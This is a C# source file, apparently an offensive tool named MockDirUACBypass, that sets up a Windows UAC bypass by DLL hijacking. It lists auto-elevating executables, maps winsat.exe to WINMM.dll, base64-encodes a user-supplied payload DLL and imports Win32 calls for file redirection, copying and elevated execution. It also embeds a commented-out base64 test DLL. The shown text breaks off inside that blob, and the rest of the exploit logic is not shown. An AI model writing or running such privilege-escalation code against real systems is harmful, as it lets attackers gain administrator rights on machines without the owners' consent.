﻿using System;
using System.IO;
using System.Runtime.InteropServices;

//Auto-elevating Executables:
//cttunesvr.exe
//inetmgr.exe
//migsetup.exe
//mmc.exe
//oobe.exe
//pkgmgr.exe
//provisionshare.exe
//provisionstorage.exe
//spinstall.exe
//winsat.exe <- WINMM.dll (timeBeginPeriod, timeEndPeriod, waveOutGetNumDevs)

namespace MockDirUACBypass
{
    class MainClass
    {
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool Wow64DisableWow64FsRedirection(ref IntPtr ptr);
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool Wow64RevertWow64FsRedirection(IntPtr ptr);

        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool CreateDirectory(string lpPathName, IntPtr lpSecurityAttributes);
        [DllImport("kernel32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
        static extern bool CopyFile(string lpExistingFileName, string lpNewFileName, bool bFailIfExists);
        [DllImport("kernel32.dll", SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        static extern bool DeleteFileW([MarshalAs(UnmanagedType.LPWStr)]string lpFileName);
        [DllImport("kernel32.dll", SetLastError = true)]
        static extern bool RemoveDirectory(string lpPathName);

        [DllImport("shell32.dll", CharSet = CharSet.Auto)]
        static extern bool ShellExecuteEx(ref SHELLEXECUTEINFO lpExecInfo);

        [StructLayout(LayoutKind.Sequential)]
        public struct SHELLEXECUTEINFO
        {
            public int cbSize;
            public uint fMask;
            public IntPtr hwnd;
            [MarshalAs(UnmanagedType.LPTStr)]
            public string lpVerb;
            [MarshalAs(UnmanagedType.LPTStr)]
            public string lpFile;
            [MarshalAs(UnmanagedType.LPTStr)]
            public string lpParameters;
            [MarshalAs(UnmanagedType.LPTStr)]
            public string lpDirectory;
            public int nShow;
            public IntPtr hInstApp;
            public IntPtr lpIDList;
            [MarshalAs(UnmanagedType.LPTStr)]
            public string lpClass;
            public IntPtr hkeyClass;
            public uint dwHotKey;
            public IntPtr hIcon;
            public IntPtr hProcess;
        }

        public enum ShowCommands : int
        {
            SW_HIDE = 0,
            SW_SHOWNORMAL = 1,
            SW_NORMAL = 1,
            SW_SHOWMINIMIZED = 2,
            SW_SHOWMAXIMIZED = 3,
            SW_MAXIMIZE = 3,
            SW_SHOWNOACTIVATE = 4,
            SW_SHOW = 5,
            SW_MINIMIZE = 6,
            SW_SHOWMINNOACTIVE = 7,
            SW_SHOWNA = 8,
            SW_RESTORE = 9,
            SW_SHOWDEFAULT = 10,
            SW_FORCEMINIMIZE = 11,
            SW_MAX = 11
        }

        [Flags]
        public enum ShellExecuteMaskFlags : uint
        {
            SEE_MASK_DEFAULT = 0x00000000,
            SEE_MASK_CLASSNAME = 0x00000001,
            SEE_MASK_CLASSKEY = 0x00000003,
            SEE_MASK_IDLIST = 0x00000004,
            SEE_MASK_INVOKEIDLIST = 0x0000000c,   // SEE_MASK_INVOKEIDLIST(0xC) implies SEE_MASK_IDLIST(0x04) 
            SEE_MASK_HOTKEY = 0x00000020,
            SEE_MASK_NOCLOSEPROCESS = 0x00000040,
            SEE_MASK_CONNECTNETDRV = 0x00000080,
            SEE_MASK_NOASYNC = 0x00000100,
            SEE_MASK_FLAG_DDEWAIT = SEE_MASK_NOASYNC,
            SEE_MASK_DOENVSUBST = 0x00000200,
            SEE_MASK_FLAG_NO_UI = 0x00000400,
            SEE_MASK_UNICODE = 0x00004000,
            SEE_MASK_NO_CONSOLE = 0x00008000,
            SEE_MASK_ASYNCOK = 0x00100000,
            SEE_MASK_HMONITOR = 0x00200000,
            SEE_MASK_NOZONECHECKS = 0x00800000,
            SEE_MASK_NOQUERYCLASSSTORE = 0x01000000,
            SEE_MASK_WAITFORINPUTIDLE = 0x02000000,
            SEE_MASK_FLAG_LOG_USAGE = 0x04000000,
        }

        public static void Main(string[] args)
        {
            IntPtr wow64Value = IntPtr.Zero;
            string hijackDll = null;

            //Collect args
            if (args.Length != 2)
            {
                Console.WriteLine("[-] Usage: MockDirUACBypass.exe <whitelisted EXE> <your DLL>");
                return;
            }

            string whitelistedExe = args[0].ToLower();

            if (whitelistedExe.Equals("winsat.exe"))
            {
                hijackDll = "WINMM.dll";
            }
            //Planning on adding other EXEs here
            else
            {
                Console.WriteLine("[-] The provided method is not whitelisted.");
                return;
            }
            //Take users' B64 DLL (x86)
            string payloadDllB64 = Convert.ToBase64String(File.ReadAllBytes(args[1]));

            // If you'd like to test, here's a DLL that exports the functions required from WINMM.dll as stubs.
            // It will pop a message box with a bool indicating IL. Thanks @ce2wells for helping me test this.
            //string payloadDllB64 = "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